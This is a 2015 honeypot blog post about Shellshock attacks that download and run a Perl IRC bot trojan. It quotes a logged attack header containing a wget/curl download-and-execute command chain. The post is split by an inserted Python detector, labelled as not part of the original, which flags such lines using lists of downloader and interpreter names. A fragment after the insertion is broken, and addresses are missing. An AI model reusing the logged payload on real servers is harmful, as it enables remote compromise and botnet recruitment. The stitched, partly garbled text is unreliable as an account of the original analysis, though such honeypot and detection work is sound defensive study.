Sunday, 14 June 2015

Perl script injection:

Over the last two days several shell injections have hit my honeypot. Each of them tried to download a Perl script and execute it:

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget;perl den;rm -fr den;curl -sO;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget;perl den;rm -fr den;curl -sO;perl den;rm -fr den*\"" US SHELLinjection
I downloaded the file manually; it is a Perl IRC bot.
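As an added example (not part of the original post), a small Python detector for log lines like the one above: it pulls the quoted header fields out of the line, looks for the Shellshock function-definition trigger `() { :;};`, and flags a fetch-then-interpret command chain. The hit is the one quoted above (URLs elided as on the page); the second, harmless line and the exact log layout are assumptions for the sake of the example.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the honeypot hit quoted above (URLs elided as on the page)
# and an assumed harmless request for comparison.
LOG_LINES = [
    r'Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget;perl den;rm -fr den;curl -sO;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget;perl den;rm -fr den;curl -sO;perl den;rm -fr den*\"" US SHELLinjection',
    r'Jun 13 06:45:02 beeswarm [mypyfwa] 2015-06-13 06:45:02.100000 - - [12/Jun/2015:20:28:10 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)" DE -',
]

# Shellshock trigger: a bash function definition followed by trailing commands,
# smuggled into a header that a CGI wrapper exports as an environment variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmds>.+)')
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # "..." fields, honouring \" escapes

DOWNLOADERS = {"wget", "curl", "fetch", "tftp"}
INTERPRETERS = {"perl", "sh", "bash", "python", "php"}


@dataclass
class Finding:
    commands: list            # leading word of each injected ';'-separated command
    download_and_execute: bool


def analyse(line):
    """Return a Finding for a Shellshock-style injection in any quoted field, else None."""
    for field in QUOTED_RE.findall(line):
        m = SHELLSHOCK_RE.search(field)
        if not m:
            continue
        commands = [c.split()[0] for c in m.group("cmds").split(";") if c.strip()]
        # A fetch followed later in the chain by an interpreter is the classic
        # download-and-execute pattern seen in the hit above.
        fetched = [i for i, c in enumerate(commands) if c in DOWNLOADERS]
        executes = fetched and any(c in INTERPRETERS for c in commands[fetched[0] + 1:])
        return Finding(commands, bool(executes))
    return None


if __name__ == "__main__":
    for line in LOG_LINES:
        print(analyse(line))
```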

 / -f den
clamscan den
den: Trojan.IRCBot-1142 FOUND
The sources of the attack are
  • (AU)
  • (US)
Both hosts seem to be hosted servers (1and1 and Ozservers).

The Perl script seems to be written by "Jericho Security Team Perl Bot v3.0".
Strange as it is, the server address within the script is set to

Even stranger, this domain is hosted by Schlund:

inetnum: -
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE